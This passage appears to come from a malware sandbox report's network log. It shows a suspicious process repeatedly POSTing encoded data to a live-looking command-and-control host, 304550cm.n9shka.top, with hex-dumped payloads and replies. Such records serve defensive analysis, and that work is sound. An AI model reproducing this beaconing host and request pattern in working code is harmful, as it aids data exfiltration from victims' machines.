Sep 8, 2024 11:52:19.650043011 CEST | 1236 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:19.923357964 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:20.138448000 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:20.218888998 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 1400
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:20.315707922 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:20.665802002 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:20.980123997 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:21.109177113 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49756 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:21.232206106 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Sep 8, 2024 11:52:21.587627888 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:21.904670000 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:22.105689049 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49757 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:22.231185913 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2528
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:22.587646961 CEST | 2528 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:22.897002935 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:23.108097076 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49758 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:23.230359077 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:23.587661982 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:23.915910959 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:24.052599907 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49759 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:24.184771061 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:24.540755987 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:24.855643988 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:24.986383915 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49760 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:25.106090069 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:25.328500032 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 1412
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:25.681519032 CEST | 1412 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:26.001065016 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:26.210725069 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: [binary payload]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:25.450258017 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:25.806585073 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:26.132617950 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:26.264496088 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.44976380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:26.387701035 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:27.048445940 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:27.251797915 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.4 | 64713 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:27.371238947 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:28.037736893 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:28.165520906 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z
                                                          Sep 8, 2024 11:52:28.415688992 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.4 | 64714 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:28.416476011 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:29.099853039 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:29.232681990 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.4 | 64715 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:29.356218100 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:30.024229050 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:30.157253027 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.4 | 64716 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:30.279043913 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:30.974498987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:31.110347033 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.4 | 64717 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:31.218843937 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:31.882287025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:32.012661934 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.4 | 64718 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:31.230880976 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:31.895951986 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.4 | 64719 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:32.136959076 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:32.802190065 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:32.936686993 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.4 | 64720 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:33.060604095 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:33.743390083 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:33.876543999 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.4 | 64721 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:33.997539997 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:34.689589024 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:34.822362900 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.4 | 64722 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:34.950304985 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:35.611612082 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:35.740118027 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.4 | 64723 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:35.879992008 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:36.557935953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:36.690263033 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.4 | 64724 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:36.816823959 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.4 | 64725 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:37.031316042 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:37.384608030 CEST | 1412 | OUT | Data Raw: 5e 5d 5c 50 5f 5a 5b 58 5c 5a 51 56 57 5f 57 52 50 5c 5e 51 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\P_Z[X\ZQVW_WRP\^QT]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z/!!\=;\4#,]*#_3?=-4;V$+Y".6(&/$'8_.#G X/1
                                                          Sep 8, 2024 11:52:37.696036100 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:37.824666977 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 1d 27 2f 2e 01 20 3e 27 1f 2b 3c 21 55 2e 13 27 00 2a 39 26 1c 3e 33 16 1e 3e 06 2e 58 2a 2b 07 09 29 2f 2f 06 34 32 3b 11 25 25 28 5e 03 11 23 5f 21 58 3e 12 3d 07 04 59 2a 31 33 01 29 2c 3b 11 21 1a 3c 10 23 3b 2b 06 23 06 35 0a 3c 00 21 09 3b 42 39 06 2e 1d 00 1c 36 24 2d 57 0c 12 23 09 2b 10 23 19 23 1d 29 15 31 07 29 5c 30 35 26 5e 2a 3b 31 0c 28 16 2e 10 25 54 20 08 27 3d 39 13 3d 01 26 14 27 07 2c 01 36 07 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &'/. >'+<!U.'*9&>3>.X*+)//42;%%(^#_!X>=Y*13),;!<#;+#5<!;B9.6$-W#+##)1)\05&^*;1(.%T '=9=&',6$S-"T=\V


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          36 | 192.168.2.4 | 64726 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:37.152292967 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:37.509574890 CEST | 2528 | OUT | Data Raw: 5b 51 59 56 5a 5c 5b 51 5c 5a 51 56 57 5b 57 54 50 59 5e 59 54 5b 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [QYVZ\[Q\ZQVW[WTPY^YT[SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z;.)!#<),'9[/7'9!X5(;^&'_9#G X/%
                                                          Sep 8, 2024 11:52:37.821981907 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:37.949392080 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
